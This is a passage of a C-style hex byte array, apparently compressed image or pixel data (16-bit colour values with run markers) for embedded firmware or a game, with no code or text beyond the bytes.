	0x12, 0x4E, 0x12, 0xFF, 0xFF, 0x4E, 0x12, 0x4E, 0x12, 0x4E, 0x12, 0x06, 0x81, 0x4E, 0x12, 0x19, 
	0x90, 0x11, 0x1B, 0x11, 0x1B, 0xFF, 0xFF, 0x11, 0x1B, 0x11, 0x1B, 0x11, 0x1B, 0x11, 0x1B, 0x11, 
	0x1B, 0x11, 0x1B, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x11, 0x1B, 0x11, 0x1B, 0x11, 
	0x1B, 0x0A, 0x80, 0x04, 0x11, 0x1B, 0x11, 0x1B, 0xFF, 0xFF, 0x11, 0x1B, 0x11, 0x1B, 0x11, 0x1B, 
	0x11, 0x23, 0x11, 0x23, 0xFF, 0xFF, 0x11, 0x23, 0x11, 0x23, 0x11, 0x23, 0xFF, 0xFF, 0x11, 0x23, 
	0x11, 0x23, 0xFF, 0xFF, 0x11, 0x23, 0x11, 0x23, 0xFF, 0xFF, 0x11, 0x23, 0x11, 0x23, 0x11, 0x23, 
	0x31, 0x23, 0x31, 0x23, 0x31, 0x23, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x31, 0x23, 
	0xFF, 0xFF, 0xFF, 0xFF, 0x31, 0x23, 0x31, 0x23, 0xFF, 0xFF, 0xFF, 0xFF, 0x72, 0x31, 0x23, 0x60, 
	0x00, 0x31, 0x2B, 0xCC, 0x63, 0x18, 0x84, 0x52, 0x33, 0x52, 0x33, 0x52, 0x33, 0x52, 0x33, 0x55, 
	0x1F, 0xF0, 0x09, 0x06, 0xF6, 0xFA, 0x00, 0x00, 0x09, 0x06, 0xED, 0xF4, 0x36, 0x01, 0x00, 0x00, 
	0x00, 0x36, 0x00, 0x00, 0x00, 0x00, 0x03, 0x83, 0x01, 0x22, 0x04, 0x05, 0x40, 0x1C, 0x41, 0x85, 
	0x08, 0x84, 0xEF, 0x1A, 0xAE, 0x12, 0x0B, 0x12, 0x88, 0x09, 0xC0, 0x0B, 0x67, 0x09, 0x84, 0x88, 
	0x09, 0x0B, 0x12, 0xAE, 0x12, 0xEF, 0x1A, 0x19, 0x88, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0xCE, 0x12, 0x88, 0x11, 0x32, 0x64, 0x77, 0x85, 0xC0, 0x0B, 0xDE, 0x8C, 0x84, 0x77, 0x85, 
	0x32, 0x64, 0x88, 0x11, 0xAE, 0x12, 0x1D, 0x84, 0x2B, 0x12, 0x12, 0x64, 0xD6, 0x5C, 0xF4, 0x33, 
	0xC0, 0x0B, 0x6A, 0xAE, 0x84, 0xF4, 0x33, 0xD6, 0x5C, 0x32, 0x64, 0x2B, 0x12, 0x1D, 0x83, 0x88, 
	0x09, 0x57, 0x7D, 0xD3, 0x2B, 0x7D, 0xB3, 0x23, 0x83, 0xD3, 0x2B, 0x57, 0x7D, 0x88, 0x09, 0x1D, 
	0x82, 0x67, 0x09, 0x58, 0x7D, 0x7F, 0x72, 0x1B, 0x82, 0x58, 0x7D, 0x67, 0x09, 0x1E, 0x81, 0x37, 
	0x7D, 0xC0, 0x0F, 0x40, 0x00, 0x81, 0x37, 0x7D, 0x1F, 0x81, 0x17, 0x75, 0xC0, 0x0F, 0x23, 0x08, 
	0x81, 0x17, 0x75, 0x00, 0x00, 0xC0, 0x0F, 0xC0, 0x01, 0x00, 0x00, 0x81, 0xF7, 0x74, 0xC0, 0x0F, 
	0x61, 0x00, 0x81, 0xF7, 0x74, 0x1F, 0x81, 0xD6, 0x74, 0xC0, 0x0F, 0xDF, 0x00, 0xDC, 0x21, 0x00, 
	0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x81, 0xB6, 0x74, 0x3F, 
	0x81, 0xB6, 0x74, 0x1F, 0xD0, 0x7F, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x81, 0x17, 0x7D, 0xC0, 0x0F, 0x5F, 0x09, 0x81, 
	0x17, 0x7D, 0x1F, 0xD0, 0x40, 0x20, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 
	0xC0, 0x0F, 0x00, 0x38, 0x00, 0x00, 0x81, 0x37, 0x85, 0xC0, 0x0F, 0x20, 0x00, 0xD0, 0x60, 0x00, 
	0xF8, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x0F, 
	0x00, 0x08, 0x00, 0x40, 0x81, 0x57, 0x85, 0xC0, 0x0F, 0x63, 0x18, 0x81, 0x57, 0x85, 0x1F, 0x81, 
	0x58, 0x8D, 0xC0, 0x0F, 0x20, 0x00, 0x81, 0x58, 0x8D, 0x1F, 0x81, 0x78, 0x8D, 0xC0, 0x0F, 0xE0, 
	0x08, 0x81, 0x78, 0x8D, 0x1E, 0x83, 0x88, 0x09, 0x57, 0x8D, 0xD3, 0x43, 0xC0, 0x0D, 0x20, 0x78, 
	0x83, 0xD3, 0x43, 0x57, 0x8D, 0x88, 0x09, 0x1D, 0x84, 0x2B, 0x12, 0x11, 0x6C, 0xD6, 0x74, 0xF3, 
	0x4B, 0xC0, 0x0B, 0x61, 0x00, 0x84, 0xF3, 0x4B, 0xD6, 0x74, 0x11, 0x6C, 0x2B, 0x12, 0x1D, 0x84, 
	0xCE, 0x12, 0x88, 0x11, 0x11, 0x64, 0x57, 0x8D, 0xC0, 0x0B, 0x4B, 0xD6, 0x84, 0x57, 0x8D, 0x11, 
	0x64, 0x88, 0x11, 0xCE, 0x12, 0x1D, 0x84, 0xEF, 0x1A, 0xCE, 0x12, 0x2B, 0x12, 0x88, 0x09, 0xC0, 
	0x0B, 0xFF, 0x9C, 0x84, 0x88, 0x09, 0x2B, 0x12, 0xCE, 0x12, 0xEF, 0x1A, 0x19, 0x84, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x15, 0x1F, 0x01, 0xF0, 0x1E, 0xFA, 0x31, 0x06, 0x02, 0x00, 
	0x1E, 0xFA, 0x13, 0x0C, 0x08, 0x00, 0x36, 0x01, 0x00, 0x00, 0x00, 0x36, 0x00, 0x00, 0x00, 0x00, 
	0x03, 0x35, 0x00, 0xA0, 0x0C, 0x05, 0x10, 0x40, 0x37, 0xFF, 0xFF, 0x2C, 0x85, 0xFF, 0xFF, 0xFF, 
	0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x2E, 0x01, 0x60, 0x50, 0x00, 0x00, 0xFD, 0x0E, 0x85, 
	0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0x6F, 0xFF, 0xFF, 0x01, 0x84, 0x00, 
	0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x44, 0x0F, 0xE8, 0x10, 0x10, 0x45, 0x2E, 0xE0, 0x11, 
	0x00, 0x20, 0x15, 0x3F, 0x01, 0xF0, 0x09, 0x06, 0xF6, 0xFA, 0x00, 0x00, 0x09, 0x06, 0xED, 0xF4, 
	0x88, 0xFF, 0x7F, 0x36, 0x01, 0x00, 0x00, 0x00, 0x36, 0x00, 0x00, 0x00, 0x00, 0x03, 0xFC, 0x00, 
	0xA0, 0x0C, 0x05, 0x10, 0x40, 0xFE, 0xFF, 0xFF, 0x0C, 0x96, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x51, 0x8C, 0x8E, 0x73, 0x8E, 0x73, 0x8E, 0x73, 0x8E, 0x73, 0x8E, 0x73, 
	0x8E, 0x73, 0x6D, 0x6B, 0x6D, 0x6B, 0x6D, 0x6B, 0x6D, 0x6B, 0x30, 0x84, 0x30, 0x84, 0x30, 0x84, 
	0x00, 0x00, 0xD3, 0x9C, 0xF7, 0xBD, 0x6C, 0xBA, 0xD6, 0x9F, 0xF7, 0xBD, 0x30, 0x84, 0xD3, 0x9C, 
	0xBA, 0xD6, 0x92, 0x94, 0xCF, 0x7B, 0x92, 0x94, 0xCF, 0x7B, 0xCF, 0x7B, 0xCF, 0x7B, 0xCF, 0x7B, 
	0xCF, 0x7B, 0xCF, 0x7B, 0x92, 0x94, 0xCF, 0x7B, 0x92, 0x94, 0xBA, 0xD6, 0x30, 0x84, 0xD3, 0x9C, 
	0xBA, 0xD6, 0x92, 0x94, 0x7D, 0xEF, 0x92, 0x94, 0x7D, 0xEF, 0x7D, 0xEF, 0x7D, 0xEF, 0x7D, 0xEF, 
	0x7D, 0xEF, 0x7D, 0xEF, 0x92, 0x94, 0x7D, 0xEF, 0x06, 0x81, 0xCF, 0x7B, 0xE5, 0xCF, 0x7B, 0x92, 
	0x94, 0x05, 0x81, 0x7D, 0xEF, 0xE5, 0x7D, 0xEF, 0x92, 0x94, 0x05, 0x6B, 0x92, 0x94, 0x03, 0x81, 
	0xF7, 0xBD, 0xCC, 0x28, 0x42, 0x86, 0xF7, 0xBD, 0x51, 0x8C, 0x00, 0x00, 0xD3, 0x9C, 0x30, 0x84, 
	0x51, 0x8C, 0xC9, 0x69, 0x4A, 0x87, 0x92, 0x94, 0xD3, 0x9C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x92, 0x94, 0x14, 0xA5, 0x6F, 0x00, 0x00, 0x89, 0xD3, 0x9C, 0x14, 0xA5, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x14, 0xA5, 0x14, 0xA5, 0x14, 0xA5, 0x14, 0xA5, 0x68, 0x00, 0x00, 0x89, 0x92, 0x94, 
	0xD3, 0x9C, 0x14, 0xA5, 0xD3, 0x9C, 0x92, 0x94, 0x92, 0x94, 0x92, 0x94, 0x92, 0x94, 0xD3, 0x9C, 
	0x68, 0x00, 0x00, 0x89, 0x51, 0x8C, 0x92, 0x94, 0x51, 0x8C, 0xB6, 0xB5, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x51, 0x8C, 0x14, 0xA5, 0x6F, 0x00, 0x00, 0x81, 0x51, 0x8C, 0x0E, 0x84, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x75, 0x20, 0x66, 0x36, 0x01, 0x00, 0x00, 0x00, 0x02, 0x00, 
	0x00, 0x36, 0x00, 0x00, 0x00, 0x00, 0x03, 0x83, 0x02, 0x21, 0x0C, 0x05, 0x20, 0x14, 0x42, 0x84, 
	0xFF, 0xFF, 0xC6, 0xEF, 0x1A, 0x8E, 0xAE, 0x13, 0xCF, 0x0C, 0x50, 0x0D, 0xB1, 0x0D, 0xAF, 0x0D, 
	0x4F, 0x0D, 0x0F, 0x0C, 0xCE, 0x13, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 
	0xEF, 0x1A, 0x08, 0x94, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xEF, 0x1A, 0xEF, 0x1A, 
	0xEF, 0x1A, 0x30, 0x13, 0x50, 0x14, 0x93, 0x0D, 0x38, 0x1F, 0x7B, 0x2F, 0x5B, 0x1F, 0x5B, 0x27, 
	0x9D, 0x5F, 0x3A, 0x37, 0x98, 0x1E, 0xD5, 0x15, 0x0F, 0x0D, 0xCE, 0x13, 0x12, 0x8F, 0x50, 0x13, 
	0xB3, 0x0C, 0x5A, 0x0F, 0xBD, 0x17, 0xBE, 0x37, 0xBE, 0x6F, 0xBE, 0x97, 0xBD, 0xA7, 0xBD, 0xA7, 
	0x7C, 0x87, 0x3C, 0x67, 0xDA, 0x2E, 0x37, 0x16, 0x32, 0x0D, 0xAE, 0x13, 0x11, 0x90, 0x14, 0x0D, 
	0x3B, 0x27, 0xFF, 0x67, 0xFF, 0x57, 0xDE, 0x87, 0x5C, 0x47, 0x1A, 0x47, 0x98, 0x1E, 0x57, 0x16, 
	0x98, 0x2E, 0xDA, 0x46, 0x5C, 0x8F, 0xD9, 0x4E, 0x17, 0x16, 0xB1, 0x0C, 0x0D, 0x13, 0x0F, 0x92, 
	0x72, 0x0C, 0x3C, 0x3F, 0xFF, 0xB7, 0xFF, 0xDF, 0xBE, 0x7F, 0xB9, 0x1E, 0x55, 0x0D, 0x51, 0x14, 
	0x70, 0x13, 0x70, 0x13, 0xD1, 0x13, 0xF2, 0x0C, 0x99, 0x56, 0xB9, 0x56, 0x99, 0x5E, 0x54, 0x0D, 
	0xEE, 0x0B, 0xCD, 0x12, 0x0E, 0x92, 0xF8, 0x05, 0xDF, 0xAF, 0xFF, 0xDF, 0xBE, 0xCF, 0x98, 0x76, 
	0x52, 0x14, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0x11, 0x1C, 
	0x33, 0x0D, 0xF7, 0x3D, 0x96, 0x3D, 0x0F, 0x0C, 0xCC, 0x0A, 0x0D, 0x94, 0x52, 0x0C, 0xFB, 0x86, 
	0xFF, 0xEF, 0xDF, 0xE7, 0x5D, 0xC7, 0x73, 0x3C, 0x0F, 0x1B, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 
	0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xB0, 0x13, 0xD3, 0x0C, 0x96, 0x4D, 0xEF, 0x13, 
	0xAA, 0x0A, 0xCD, 0x12, 0x0C, 0x86, 0x92, 0x0C, 0x5C, 0x9F, 0xFF, 0xFF, 0x5D, 0xDF, 0x75, 0x6D, 
	0x0F, 0x1B, 0x69, 0xEF, 0x1A, 0x85, 0xD0, 0x0B, 0x30, 0x1C, 0xEE, 0x2B, 0x09, 0x0B, 0xCC, 0x0A, 
	0x0C, 0x85, 0x52, 0x0C, 0x79, 0x3E, 0x7D, 0x87, 0x7A, 0x7E, 0xB1, 0x23, 0x6A, 0xEF, 0x1A, 0x85, 
	0x4F, 0x13, 0x8E, 0x0B, 0xED, 0x2B, 0x51, 0x64, 0xCA, 0x0A, 0x0C, 0x85, 0xD1, 0x0B, 0x75, 0x25, 
	0x18, 0x2E, 0x15, 0x15, 0x71, 0x13, 0x0A, 0x85, 0x0F, 0x13, 0x6D, 0x03, 0x6C, 0x23, 0x0A, 0x2B, 
	0x6A, 0x0A, 0x0C, 0x85, 0xED, 0x0A, 0x72, 0x34, 0x93, 0x14, 0x52, 0x0C, 0x30, 0x13, 0x0A, 0x85, 
	0x0F, 0x1B, 0x32, 0x3C, 0xEB, 0x12, 0xEC, 0x32, 0x2A, 0x0A, 0x0C, 0x85, 0x6C, 0x0A, 0x8F, 0x43, 
	0x52, 0x4C, 0xB4, 0x4C, 0x91, 0x23, 0x0A, 0x85, 0x70, 0x23, 0xB2, 0x4C, 0x70, 0x4C, 0x6D, 0x43, 
	0x2B, 0x0A, 0x0C, 0x85, 0x6C, 0x12, 0x11, 0x64, 0xF4, 0x7C, 0x94, 0x5C, 0xF2, 0x33, 0x0A, 0x85, 
	0xF2, 0x33, 0xF3, 0x5C, 0x39, 0xAE, 0x70, 0x5C, 0x6C, 0x12, 0x0C, 0x86, 0xAE, 0x12, 0x4F, 0x43, 
	0xB7, 0x9D, 0x16, 0x75, 0xB5, 0x54, 0x91, 0x2B, 0x08, 0x86, 0x91, 0x2B, 0xB5, 0x54, 0x35, 0x6D, 
	0xF7, 0x9D, 0x8E, 0x43, 0xAE, 0x12, 0x0C, 0x87, 0xEF, 0x1A, 0x4C, 0x12, 0x76, 0x95, 0xD8, 0x9D, 
	0x78, 0x75, 0x95, 0x4C, 0x92, 0x2B, 0x06, 0x87, 0xB2, 0x2B, 0xB5, 0x4C, 0x77, 0x75, 0xF8, 0x9D, 
	0x76, 0x95, 0x4C, 0x12, 0xEF, 0x1A, 0x0D, 0x92, 0x8D, 0x12, 0x90, 0x3B, 0x7B, 0xBE, 0x3A, 0xA6, 
	0xB9, 0x8D, 0x17, 0x65, 0x34, 0x44, 0x92, 0x2B, 0x30, 0x1B, 0x10, 0x1B, 0x92, 0x2B, 0x34, 0x44, 
	0x37, 0x65, 0x3A, 0xA6, 0x5A, 0xA6, 0xBB, 0xC6, 0x90, 0x3B, 0x8D, 0x12, 0x0E, 0x92, 0xEF, 0x1A, 
	0x8E, 0x12, 0x54, 0x54, 0xFC, 0xC6, 0xBC, 0xBE, 0x3B, 0xA6, 0xDA, 0x95, 0xB8, 0x85, 0xFA, 0x95, 
	0x98, 0x7D, 0x99, 0x85, 0xF9, 0x95, 0x5A, 0xA6, 0xDB, 0xBE, 0xFC, 0xCE, 0x74, 0x5C, 0xAD, 0x12, 
	0xEF, 0x1A, 0x0F, 0x90, 0xEF, 0x1A, 0xCF, 0x12, 0x55, 0x4C, 0xBC, 0xBE, 0x3D, 0xD7, 0xFD, 0xC6, 
	0xBC, 0xBE, 0x9B, 0xB6, 0x9B, 0xB6, 0xBC, 0xBE, 0xFC, 0xC6, 0x7E, 0xE7, 0xBB, 0xBE, 0x55, 0x4C, 
	0xCF, 0x12, 0xEF, 0x1A, 0x11, 0x8E, 0xEF, 0x1A, 0xF0, 0x12, 0x11, 0x13, 0xF7, 0x6C, 0x7B, 0xB6, 
	0x1D, 0xD7, 0x9E, 0xEF, 0x9E, 0xEF, 0x1D, 0xD7, 0x7B, 0xB6, 0x36, 0x6D, 0x50, 0x13, 0xF0, 0x12, 
	0xEF, 0x1A, 0x13, 0x8C, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x12, 0xF0, 0x12, 0xF1, 0x0A, 0xF1, 0x0A, 
	0xF1, 0x0A, 0xF1, 0x0A, 0xF0, 0x12, 0xEF, 0x12, 0xEF, 0x1A, 0xEF, 0x1A, 0x0C, 0x84, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x41, 0x3F, 0x01, 0x00, 0xC2, 0x01, 0x43, 0x01, 0x14, 0x00, 
	0x14, 0x00, 0xCC, 0x36, 0x01, 0x00, 0x00, 0x00, 0x36, 0x00, 0x00, 0x00, 0x00, 0x03, 0x6F, 0x0A, 
	0x22, 0x0C, 0x05, 0x40, 0x29, 0x4A, 0x70, 0xFF, 0xFF, 0xC0, 0x2C, 0xEF, 0x1A, 0x84, 0xEF, 0x1A, 
	0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xF0, 0xC5, 0x01, 0x80, 0x19, 0xCF, 0x1A, 0xCF, 0x1A, 0xCF, 
	0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xCF, 0x1A, 0xCE, 0x1A, 0xCE, 0x1A, 0xCF, 0x1A, 0xEF, 0x1A, 0xEF, 
	0x1A, 0xEF, 0x1A, 0xCF, 0x1A, 0xCE, 0x1A, 0xAE, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0xCE, 0x1A, 0xCF, 
	0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xCF, 0x1A, 0xCE, 0x1A, 0xAE, 
	0x12, 0xCE, 0x1A, 0xCF, 0x1A, 0xCF, 0x1A, 0xCF, 0x1A, 0xCE, 0x1A, 0xCE, 0x1A, 0xCF, 0x1A, 0xEF, 
	0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xCF, 0x1A, 0xCE, 0x1A, 0xAE, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0xAE, 
	0x12, 0xCE, 0x1A, 0xCF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xCF, 0x1A, 0xCE, 0x1A, 0xAE, 0x12, 0xCE, 
	0x1A, 0xCF, 0x1A, 0xCF, 0x1A, 0xCF, 0x1A, 0xCE, 0x1A, 0xCE, 0x1A, 0xCF, 0x1A, 0x06, 0x80, 0xC3, 
	0xCE, 0x1A, 0xAE, 0x12, 0xAD, 0x12, 0xAE, 0x12, 0xCE, 0x1A, 0xCE, 0x1A, 0xAE, 0x12, 0xAD, 0x12, 
	0xAD, 0x12, 0xAE, 0x12, 0xCF, 0x1A, 0xEF, 0x1A, 0xCE, 0x1A, 0xAE, 0x12, 0x8D, 0x12, 0x8D, 0x12, 
	0x8D, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0xAE, 0x12, 0xCE, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 
	0xCF, 0x1A, 0xAE, 0x12, 0xAD, 0x12, 0x8D, 0x12, 0xAD, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0xAE, 0x12, 
	0xAD, 0x12, 0xAD, 0x12, 0xAE, 0x12, 0xCF, 0x1A, 0xEF, 0x1A, 0xCF, 0x1A, 0xAE, 0x12, 0xAD, 0x12, 
	0x8D, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0xAD, 0x12, 0xAE, 0x12, 0xCF, 0x1A, 0xCF, 0x1A, 
	0xAE, 0x12, 0xAD, 0x12, 0x8D, 0x12, 0xAD, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0x8D, 0x12, 
	0x8D, 0x12, 0xAD, 0x12, 0xAE, 0x12, 0xCF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xCF, 0x1A, 
	0xAE, 0x12, 0x8D, 0x12, 0x6C, 0x12, 0x6D, 0x12, 0xAD, 0x12, 0xAD, 0x12, 0x8D, 0x12, 0x6D, 0x12, 
	0x6D, 0x12, 0xAD, 0x12, 0xCE, 0x1A, 0xEF, 0x1A, 0xCE, 0x1A, 0xAE, 0x12, 0x8D, 0x12, 0x8D, 0x12, 
	0x6D, 0x12, 0x6C, 0x12, 0x6C, 0x12, 0x8D, 0x12, 0xAE, 0x12, 0xCF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 
	0xCE, 0x1A, 0xAD, 0x12, 0x6D, 0x12, 0x4C, 0x12, 0x6D, 0x12, 0xAD, 0x12, 0xAD, 0x12, 0xAD, 0x12, 
	0x6D, 0x12, 0x6D, 0x12, 0xAD, 0x12, 0xCE, 0x1A, 0xEF, 0x1A, 0xCF, 0x1A, 0xAE, 0x12, 0xAD, 0x12, 
	0x8D, 0x12, 0x6D, 0x12, 0x6C, 0x12, 0x4C, 0x12, 0x6D, 0x12, 0xAD, 0x12, 0xCE, 0x1A, 0xCE, 0x1A, 
	0xAD, 0x12, 0x6D, 0x12, 0x4C, 0x12, 0x6D, 0x12, 0x8D, 0x12, 0xAD, 0x12, 0xAE, 0x12, 0x8D, 0x12, 
	0x6D, 0x12, 0x6D, 0x12, 0x8D, 0x12, 0xAD, 0x12, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xCF, 0x1A, 
	0xAD, 0x12, 0x6C, 0x12, 0x4B, 0x12, 0x4B, 0x12, 0x6C, 0x12, 0x6C, 0x12, 0x4C, 0x12, 0x4B, 0x12, 
	0x4C, 0x12, 0x8D, 0x12, 0xAE, 0x12, 0xEF, 0x1A, 0xCE, 0x1A, 0xAE, 0x12, 0x8D, 0x12, 0x8D, 0x12, 
	0x6C, 0x12, 0x4C, 0x12, 0x4B, 0x12, 0x4C, 0x12, 0x8D, 0x12, 0xCE, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 
	0xAE, 0x12, 0x8D, 0x12, 0x4C, 0x12, 0x0B, 0x12, 0x4C, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0x8D, 0x12, 
	0x4C, 0x12, 0x4C, 0x12, 0x8D, 0x12, 0xAE, 0x12, 0xEF, 0x1A, 0xCF, 0x1A, 0xAE, 0x12, 0xAD, 0x12, 
	0x8D, 0x12, 0x6C, 0x12, 0x4C, 0x12, 0x2B, 0x12, 0x4C, 0x12, 0x8D, 0x12, 0xAE, 0x12, 0xAE, 0x12, 
	0x8D, 0x12, 0x4C, 0x12, 0x0B, 0x12, 0x4C, 0x12, 0x6D, 0x12, 0x8D, 0x12, 0xAE, 0x12, 0x8D, 0x12, 
	0x6D, 0x12, 0x6C, 0x12, 0x6C, 0x12, 0x6D, 0x12, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xCF, 0x1A, 
	0x8D, 0x12, 0x4C, 0x12, 0x0B, 0x12, 0x0A, 0x12, 0x2B, 0x12, 0x2B, 0x12, 0x2B, 0x12, 0x0A, 0x12, 
	0x0B, 0x12, 0x4C, 0x12, 0x8D, 0x12, 0xAE, 0x12, 0x8D, 0x12, 0x6D, 0x12, 0x4C, 0x12, 0x4C, 0x12, 
	0x2B, 0x12, 0x0B, 0x12, 0x0A, 0x12, 0x2B, 0x12, 0x6D, 0x12, 0xAE, 0x12, 0xCF, 0x1A, 0xCF, 0x1A, 
	0x8D, 0x12, 0x4C, 0x12, 0x2B, 0x12, 0xE9, 0x11, 0x2B, 0x12, 0x6C, 0x12, 0x6C, 0x12, 0x6C, 0x12, 
	0x2B, 0x12, 0x2B, 0x12, 0x6C, 0x12, 0x06, 0x93, 0x4C, 0x12, 0x2B, 0x12, 0x0A, 0x12, 0x2B, 0x12, 
	0x6C, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0x6C, 0x12, 0x2B, 0x12, 0xE9, 0x11, 0x2B, 0x12, 0x4C, 0x12, 
	0x8D, 0x12, 0xAE, 0x12, 0x8D, 0x12, 0x6D, 0x12, 0x6C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x06, 0x99, 
	0x0A, 0x12, 0xEA, 0x11, 0x0A, 0x12, 0x0A, 0x12, 0x0A, 0x12, 0xEA, 0x11, 0x0A, 0x12, 0x2B, 0x12, 
	0x4C, 0x12, 0x6D, 0x12, 0x6C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x2B, 0x12, 0x0B, 0x12, 
	0xEA, 0x11, 0x2B, 0x12, 0x6C, 0x12, 0x8D, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0x6C, 0x12, 0x4B, 0x12, 
	0x0B, 0x12, 0x06, 0x87, 0x0B, 0x12, 0x4C, 0x12, 0x8D, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0xAD, 0x12, 
	0x8D, 0x12, 0x0B, 0x90, 0x0B, 0x12, 0x4B, 0x12, 0x6C, 0x12, 0xAD, 0x12, 0x8D, 0x12, 0x8D, 0x12, 
	0x8D, 0x12, 0x6C, 0x12, 0x4C, 0x12, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xAD, 0x12, 
	0x4C, 0x12, 0x0B, 0x12, 0x08, 0x90, 0x8D, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0x8D, 0x12, 
	0x4C, 0x12, 0x2B, 0x12, 0x0A, 0x12, 0x2B, 0x12, 0x6C, 0x12, 0x8D, 0x12, 0xAD, 0x12, 0x8D, 0x12, 
	0x4B, 0x12, 0x2B, 0x12, 0x0A, 0x12, 0x06, 0x86, 0x0A, 0x12, 0x2B, 0x12, 0x4C, 0x12, 0x8D, 0x12, 
	0x8D, 0x12, 0x8D, 0x12, 0x0C, 0x80, 0x0E, 0x0A, 0x12, 0x2B, 0x12, 0x4C, 0x12, 0x8D, 0x12, 0x8D, 
	0x12, 0x8D, 0x12, 0x8D, 0x12, 0x4C, 0x12, 0x2B, 0x12, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 
	0x1A, 0xAE, 0x12, 0x6C, 0x12, 0x2B, 0x12, 0xEA, 0x11, 0x0B, 0x12, 0x0B, 0x12, 0x0B, 0x12, 0xEA, 
	0x11, 0xEA, 0x11, 0x0B, 0x12, 0x2B, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x4C, 
	0x12, 0x2B, 0x12, 0x0B, 0x12, 0xEA, 0x11, 0x2B, 0x12, 0x6C, 0x12, 0x6D, 0x12, 0x8D, 0x12, 0x4C, 
	0x12, 0x0B, 0x12, 0x0A, 0x12, 0xEA, 0x11, 0xE9, 0x11, 0x0B, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x4C, 
	0x12, 0x0B, 0x12, 0x12, 0x87, 0xEA, 0x11, 0x0B, 0x12, 0x2B, 0x12, 0x4C, 0x12, 0x6C, 0x12, 0x6D, 
	0x12, 0x6D, 0x12, 0x09, 0x9E, 0x0A, 0x12, 0x2B, 0x12, 0x2B, 0x12, 0x2B, 0x12, 0x0A, 0x12, 0xEA, 
	0x11, 0xEA, 0x11, 0x0A, 0x12, 0x0B, 0x12, 0x0B, 0x12, 0x0B, 0x12, 0x0B, 0x12, 0x0B, 0x12, 0x0A, 
	0x12, 0xEA, 0x11, 0xEA, 0x11, 0x2B, 0x12, 0x6C, 0x12, 0x6D, 0x12, 0x6D, 0x12, 0x4B, 0x12, 0xEA, 
	0x11, 0xEA, 0x11, 0xEA, 0x11, 0xE9, 0x11, 0x0A, 0x12, 0x2B, 0x12, 0x2B, 0x12, 0x2B, 0x12, 0x0A, 
	0x12, 0x13, 0x88, 0xEA, 0x11, 0x0A, 0x12, 0x2B, 0x12, 0x4C, 0x12, 0x6C, 0x12, 0x8D, 0x12, 0x6D, 
	0x12, 0x4C, 0x12, 0x07, 0x80, 0x18, 0x0B, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x0B, 0x12, 
